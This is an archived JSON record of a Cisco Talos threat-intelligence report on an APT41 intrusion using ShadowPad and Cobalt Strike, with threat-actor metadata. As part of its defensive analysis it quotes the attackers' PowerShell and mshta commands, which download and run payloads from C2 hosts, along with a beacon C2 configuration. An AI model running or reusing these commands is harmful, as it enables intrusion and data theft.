{
	"id": "3eda53bf-01d4-40dc-9c54-a6cd6e383385",
	"created_at": "2026-04-06T00:08:27.224301Z",
	"updated_at": "2026-04-10T03:36:33.835457Z",
	"deleted_at": null,
	"sha1_hash": "8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc",
	"title": "APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1560501,
	"plain_text": "APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike\r\nBy Joey Chen\r\nPublished: 2024-08-01 · Archived: 2026-04-05 14:52:38 UTC\r\nThursday, August 1, 2024 08:00\r\nCisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated research institute, starting as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and other customized tools for post-compromise activities.\r\nThe activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S. government to be comprised of Chinese nationals. Talos assesses with medium confidence that the combined usage of malware, open-source tools and projects, procedures and post-compromise activity matches this group’s usual methods of operation.\r\nThe ShadowPad malware used in the current campaign exploited an outdated, vulnerable version of a Microsoft Office IME binary as a loader to load the customized second-stage loader that launches the payload.\r\nWe also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.\r\nTaiwanese Government-Affiliated Research Institute compromised by Chinese Actor\r\nIn August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts in the environment of a Taiwanese research institute. The nature of the research and development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them.\r\nChinese Threat Actors likely Behind the Attacks\r\nCisco Talos assesses with medium confidence that this campaign was carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups.\r\nTalos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.\r\nShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups. The malware has been publicly reported as used by APT41, a hacking group believed to be based out of Chengdu, China, according to the U.S. Department of Justice. Along with APT41, it has also been used by other Chinese hacking groups such as Mustang Panda and the Tonto Team.\r\nDuring the investigation, we observed several TTPs and IoCs that were also seen in previously reported campaigns, including the following:\r\nThe same second-stage loader binary: The second-stage loader discovered by Talos, which follows the initial side-loaded ShadowPad loader, had previously been publicly associated with ShadowPad. We also observed identical loading mechanisms, infection chains and file names in the current attacks, consistent with reliable earlier open-source reporting.\r\nInfrastructure overlap: Besides the binary connection, we also found a C2 (103.56.114[.]69) that was reported by Symantec. Although that campaign reportedly ran in April 2022, more than one year before the campaign we discovered, there were several similarities between the TTPs observed in the two campaigns, including use of the same ShadowPad Bitdefender loader, similar file names for the tool, FileZilla for moving files between endpoints and the WebPass tool for dumping credentials.\r\nUse of a Bitdefender executable for sideloading: The actor uses an eleven-year-old Bitdefender executable to sideload the DLL-based ShadowPad loader. This technique has been seen in a variety of reports attributed to APT41 (Reports: 1, 2, 3, 4).\r\nChinese-Speaking Threat Actor\r\nThis attack saw the use of a unique Cobalt Strike loader, written in Go, meant to evade detection of Cobalt Strike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on GitHub and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and technical tutorial articles.\r\nThe Cobalt Strike loader also contains file and directory path strings in Simplified Chinese, indicating that the threat actors that built/compiled the loader were well-versed in the language.\r\nThe GitHub repository of the Cobalt Strike loader.\r\nTechnical tutorial article on making an anti-AV Cobalt Strike backdoor.\r\nTactic, Technique and Procedure Analysis\r\nIn August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download a PowerShell script for execution in the target's environment. We performed an investigation based on our telemetry and found the earliest infiltration trace in mid-July 2023. We currently lack sufficient evidence to conclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network.\r\nUpon accessing the network, the attackers started to gain a foothold by executing malicious code and binaries on the machine. On the machine hosting the web server, a webshell was installed to enable the threat actor to perform discovery and execution. The threat actors also dropped malware including ShadowPad and Cobalt Strike via three different approaches: the installed webshell, RDP access and a reverse shell.\r\nWebshell drop\r\nC:/www/un/imjp14k.dll\r\nC:/www/un/service.exe\r\nC:/www/un/imjp14k.dll.dat\r\nRDP drop\r\nC:/Users/[hide]/Desktop/log.dll\r\nC:/Users/[hide]/Desktop/imjp14k.dll\r\nC:/Users/[hide]/Desktop/service.exe\r\nC:/Users/[hide]/Desktop/imjp14k.dll.dat\r\nC:/Users/[hide]/Desktop/log.dll.dat\r\nReverse shell drop\r\nC:/Users/Public/calc.exe\r\nC:/Users/Public/service.exe\r\nC:/Users/Public/imjp14k.dll\r\nC:/Users/Public/imjp14k.dll.dat\r\nC:/Users/Public/log.dll\r\nC:/Users/Public/log.dll.dat\r\nWe noticed that a couple of the ShadowPad components were detected and quarantined by our solution when being dropped. The threat actor later changed tactics to bypass the detection. The first attempt was running the following PowerShell commands to launch a PowerShell script that downloads additional scripts (PowerShell and HTA) to run the backdoor in memory.\r\npowershell IEX (New-Object System.Net.Webclient).DownloadString('http://103.56.114[.]69:8085/p.ps1');test123\"\r\npowershell IEX (New-Object System.Net.Webclient).DownloadString('https://www.nss.com[.]tw/p.ps1');test123\"\r\nmshta https://www.nss.com[.]tw/1.hta\r\npowershell -nop -w hidden -encodedcommand “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM...\"\r\nHowever, the attempt was again detected and interrupted before the attackers could carry out further actions. Later on, the attackers used another two PowerShell commands to download Cobalt Strike malware from a compromised C2 server (www.nss.com[.]tw). The Cobalt Strike malware had been built with an anti-AV loader to bypass AV detection and avoid quarantine by the security product. The following commands were used by the threat actor to download the anti-AV malware and run it on the victim's host machine. A more detailed description of the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis section.\r\npowershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');\"\r\npowershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe'); \"\r\nDuring the compromise the threat actor attempted to exploit CVE-2018-0824 with a tool called UnmarshalPwn, which we detail in the sections below.\r\nThe malicious actor is careful to avoid detection: during its activity it executes “quser”, which, when using RDP, shows who else is logged on to the system, so the actor can stop its activity if any other user is present. Cisco Talos also noticed that once the backdoors are deployed, the malicious actor deletes the webshell and the guest account that allowed the initial access.\r\nInformation gathering and exfiltration\r\nWe observed the threat actor harvesting passwords from the compromised environment. The actor uses Mimikatz to harvest hashes from the lsass process address space and WebBrowserPassView to get all credentials stored in the web browsers.\r\nFrom the environment the actor executes several commands, including “net,” “whoami,” “quser,” “ipconfig,” “netstat,” and “dir,” to obtain information on user accounts, directory structure and network configuration from the compromised systems. In addition, we also observed a query of the registry key that holds the current state of software inventory collection on the system, with the following command:\r\nC:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nBesides running commands to discover the network, we also observed the ShadowPad sample perform lightweight network scanning to enumerate the hosts in the network. The malware tries to discover other machines in the same compromised network environment by connecting sequentially to the IPs in the same class C range. The connections were all sent to port “53781”, for reasons unknown.\r\nTo exfiltrate a large number of files from multiple compromised machines, we observed the threat actors using 7zip to compress and encrypt the files into an archive and later using the backdoors to send the archive to the command and control server.\r\nMalware and Malicious Tools Analysis\r\nAlthough there are no new backdoors or hacking tools in this attack, we did find some interesting malware loaders. The threat actor leverages two major backdoors in their infection chains in this campaign: ShadowPad and Cobalt Strike. Those two backdoors were installed via webshell, reverse shell and RDP by the attackers themselves. In addition, two interesting hacking tools were also found: one for local privilege escalation and the other for harvesting web browser credentials.\r\nShadowPad Loader\r\nDuring our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.\r\nThe initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained consistent with earlier reports.\r\nThe more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current module for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader to seek out and decrypt the \"Imjp14k.dll.dat\" payload for injection into the system's memory.\r\nThe imjp14k loader checksum\r\nFurthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. We identified two different loader types, yet both employed the same legitimate binary to launch the malware.\r\nG:\\Bee\\Bee6.2(HD)\\Src\\Dll_3F_imjp14k\\Release\\Dll_3F_imjp14k.pdb\r\nG:\\Bee\\Tree\\Src\\Dll_3F_imjp14k\\Release\\Dll.pdb\r\nSecond type of imjp14k loader checksum\r\nCobalt Strike “Anti-AV loader” from Chinese Open Source Project\r\nA Cobalt Strike loader was also detected in this incident. On deeper analysis of this loader, we found it was not only packed with UPX but also had its section names modified to hinder unpacking. There are some interesting observations here suggesting that the adversary may be Chinese-speaking. The loader was developed in the Go programming language, and a string in the binary indicates a project name “go版本”, which means “go version” in Mandarin. Based on the project name we found that the code was cloned from a GitHub source written in Simplified Chinese, whose purpose is to keep Cobalt Strike from being deleted by antivirus products.\r\nEmbedded project name\r\nUpon analyzing the malware and the GitHub page we found, we discovered that the attacker might have followed the GitHub steps to generate this loader and deploy the Cobalt Strike beacon to the victim's environment; the screenshots show that this loader retrieves an encrypted picture from the C2 server and that its code logic is the same as the one on GitHub.\r\nSource code from GitHub\r\nMalware from the attack\r\nIt’s important to highlight that this Cobalt Strike beacon shellcode used steganography to hide in a picture and was executed by this loader. In other words, its download, decryption and execution routines all happen at runtime in memory. The Cobalt Strike beacon configuration is shown below.\r\n{\"C2Server\": \"http://45.85.76.18:443/yPc1\", \"User Agent\": \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n\"}\r\nThe Unmarshal.exe malware decrypts its payload in four stages. The first stage is the executable file, which searches for [filename].tbin and injects the first-stage decryption payload, inject_loader_1.dll, into an allocated memory block. The first-stage decryption payload decompresses the second-stage payload, inject_loader_2.dll, and injects it into memory; the second-stage payload in turn searches for a *.dlls or ddb.dlls file for the next-stage payload. If it cannot find the specific file, it decrypts the final payload and injects it into another memory block. After deep analysis, we found the final payload is the UnmarshalPwn malware, a POC for CVE-2018-0824 that uses a remote code execution vulnerability to get local privilege escalation.\r\nWith the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that were likely used by the same threat actors but in different campaigns. Although we don’t have further visibility into more details about these campaigns at the moment, we hope that by revealing this information we can empower the community to connect the dots and leverage these insights for additional investigations.\r\nWe found two other ShadowPad loaders by pivoting on the Rich PE header (978ece20137baea2bcb364b160eb9678) of the ShadowPad loader. Sharing the same Rich PE header indicates that these binaries share a similar compilation environment.\r\n2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9\r\neba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28\r\nOne of the loaders was observed being downloaded from two C2 servers:\r\n103.96.131[.]84\r\n58.64.204[.]145\r\nBesides the ShadowPad loader, we found the same Bitdefender loader (386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server. The ShadowPad payload connects to an interesting C2 domain, w2.chatgptsfit[.]com, for communication.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nClamAV detections are also available for this threat:\r\nWin.Packed.UnmarshalPwn-10019484-0\r\nWin.Packed.CobaltStrike-10019485-0\r\nWin.Loader.UnmarshalPwn-10019486-0\r\nWin.Loader.Shadowpad-10019487-0\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/"
	],
	"report_names": [
		"chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "58db0213-4872-41fe-8a76-a7014d816c73",
			"created_at": "2023-01-06T13:46:38.61757Z",
			"updated_at": "2026-04-10T02:00:03.040816Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"G0131",
				"PLA Unit 65017",
				"Earth Akhlut",
				"TAG-74",
				"CactusPete",
				"KARMA PANDA",
				"BRONZE HUNTLEY",
				"Red Beifang"
			],
			"source_name": "MISPGALAXY:Tonto Team",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "da483338-e479-4d74-a6dd-1fb09343fd07",
			"created_at": "2022-10-25T15:50:23.698197Z",
			"updated_at": "2026-04-10T02:00:05.355597Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Tonto Team",
				"Earth Akhlut",
				"BRONZE HUNTLEY",
				"CactusPete",
				"Karma Panda"
			],
			"source_name": "MITRE:Tonto Team",
			"tools": [
				"Mimikatz",
				"Bisonal",
				"ShadowPad",
				"LaZagne",
				"NBTscan",
				"gsecdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "17d16126-35d7-4c59-88a5-0b48e755e80f",
			"created_at": "2025-08-07T02:03:24.622109Z",
			"updated_at": "2026-04-10T02:00:03.726126Z",
			"deleted_at": null,
			"main_name": "BRONZE HUNTLEY",
			"aliases": [
				"CactusPete ",
				"Earth Akhlut ",
				"Karma Panda ",
				"Red Beifang",
				"Tonto Team"
			],
			"source_name": "Secureworks:BRONZE HUNTLEY",
			"tools": [
				"Bisonal",
				"RatN",
				"Royal Road",
				"ShadowPad"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a",
			"created_at": "2022-10-25T16:07:24.332084Z",
			"updated_at": "2026-04-10T02:00:04.940672Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Bronze Huntley",
				"CactusPete",
				"Earth Akhlut",
				"G0131",
				"HartBeat",
				"Karma Panda",
				"LoneRanger",
				"Operation Bitter Biscuit",
				"TAG-74",
				"Tonto Team"
			],
			"source_name": "ETDA:Tonto Team",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Bioazih",
				"Bisonal",
				"CONIME",
				"Dexbia",
				"Korlia",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc.pdf",
		"text": "https://archive.orkl.eu/8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc.txt",
		"img": "https://archive.orkl.eu/8c5f458c42dacd87e817aa0fd3fa9583dc27fbfc.jpg"
	}
}